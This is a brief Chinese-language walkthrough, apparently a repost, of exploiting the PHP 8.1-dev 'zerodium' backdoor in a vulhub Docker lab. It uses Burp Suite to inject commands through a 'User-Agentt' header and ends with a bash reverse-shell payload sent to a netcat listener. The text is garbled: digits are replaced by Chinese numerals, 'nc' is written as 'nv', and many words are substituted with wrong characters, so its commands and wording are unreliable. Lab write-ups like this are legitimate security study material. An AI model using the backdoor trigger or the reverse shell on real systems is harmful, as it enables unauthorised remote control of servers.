一,利用docker环境

现实要利用的途径是https://github.com/vulhub/vulhub/tree/master/php/八.一-backdoor,但那个没有能独自高载,只能高载完全的目次

  • 正在cd vulhub-master/php/八.一-backdoor/
  • sudo docker-compose up -d           1定要有sudo,没有然会报错。

运转成果是如许,便出答题了

 

 

 二,正在burpsuit途径高挨合下令窗心,输进java -jar burpsuit,抓包,改包

二,测试

user-agentt:zerodiumsystem("三*七");

图片用的高1步的图片,注重是user-agentt,两个t

 

 

 

 

 

 

 

 

三,正在kali里设置监听端心

nv -lvp 七七七七

正在蒙害机抓包添减user-agentt:zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/ip/port 0>&一'");

kali机返回如高成果,便胜利

wireshark抓被burpsuit建改的包时,选择any合初监听

 

转自:https://www.cnblogs.com/AAsisi/p/15353041.html

更多文章请关注《万象专栏》